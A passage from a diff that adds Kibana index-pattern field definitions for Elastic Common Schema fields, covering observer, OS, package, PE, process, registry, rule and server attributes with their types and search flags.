"observer.ingress.interface.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.ingress.interface.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.ingress.vlan.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.ingress.vlan.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.ingress.zone", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "ip" + ], + "name": "observer.ip", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "ip" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.mac", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.os.family", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.os.full", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "observer.os.full.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "observer.os.full" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.os.kernel", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.os.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "observer.os.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "observer.os.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.os.platform", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.os.version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.product", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.serial_number", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.vendor", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "observer.version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "organization.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "organization.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "organization.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "organization.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "os.family", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "os.full", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "os.full.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "os.full" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "os.kernel", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "os.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "os.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "os.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "os.platform", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "os.version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "package.architecture", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "package.build_version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "package.checksum", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "package.description", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "package.install_scope", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "package.installed", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "package.license", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "package.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "package.path", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "package.reference", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "package.size", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "package.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "package.version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "pe.company", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "pe.description", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "pe.file_version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "pe.original_file_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "pe.product", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.args", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "process.args_count", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "boolean" + ], + "name": "process.code_signature.exists", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "boolean" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.code_signature.status", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.code_signature.subject_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "boolean" + ], + "name": "process.code_signature.trusted", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "boolean" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "boolean" + ], + "name": "process.code_signature.valid", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "boolean" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.command_line", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "process.command_line.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "process.command_line" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.entity_id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.executable", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "process.executable.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "process.executable" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "process.exit_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.hash.md5", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.hash.sha1", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.hash.sha256", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.hash.sha512", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "process.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "process.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.parent.args", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "process.parent.args_count", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "boolean" + ], + "name": "process.parent.code_signature.exists", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "boolean" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.parent.code_signature.status", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.parent.code_signature.subject_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "boolean" + ], + "name": "process.parent.code_signature.trusted", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "boolean" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "boolean" + ], + "name": "process.parent.code_signature.valid", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "boolean" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.parent.command_line", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "process.parent.command_line.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "process.parent.command_line" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.parent.entity_id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.parent.executable", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "process.parent.executable.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "process.parent.executable" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "process.parent.exit_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.parent.hash.md5", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.parent.hash.sha1", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.parent.hash.sha256", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.parent.hash.sha512", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.parent.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "process.parent.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "process.parent.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "process.parent.pgid", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "process.parent.pid", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "process.parent.ppid", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "process.parent.start", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "process.parent.thread.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.parent.thread.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.parent.title", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "process.parent.title.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "process.parent.title" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "process.parent.uptime", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.parent.working_directory", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "process.parent.working_directory.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "process.parent.working_directory" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.pe.company", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.pe.description", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.pe.file_version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.pe.original_file_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.pe.product", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "process.pgid", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "process.pid", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "process.ppid", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "process.start", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "process.thread.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.thread.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.title", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "process.title.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "process.title" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "process.uptime", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "process.working_directory", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "process.working_directory.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "process.working_directory" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "registry.data.bytes", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "registry.data.strings", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "registry.data.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "registry.hive", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "registry.key", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "registry.path", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "registry.value", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "related.hash", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "ip" + ], + "name": "related.ip", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "ip" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "related.user", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "rule.author", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "rule.category", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "rule.description", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "rule.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "rule.license", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "rule.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "rule.reference", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "rule.ruleset", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "rule.uuid", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "rule.version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.address", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "server.as.number", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.as.organization.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "server.as.organization.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "server.as.organization.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "server.bytes", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.geo.city_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.geo.continent_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.geo.country_iso_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.geo.country_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "geo_point" + ], + "name": "server.geo.location", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "geo_point" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.geo.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.geo.region_iso_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.geo.region_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "ip" + ], + "name": "server.ip", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "ip" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.mac", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "ip" + ], + "name": "server.nat.ip", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "ip" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "server.nat.port", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "server.packets", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "server.port", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.registered_domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.top_level_domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.user.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.user.email", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.user.full_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "server.user.full_name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "server.user.full_name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.user.group.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.user.group.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.user.group.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.user.hash", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.user.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "server.user.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + 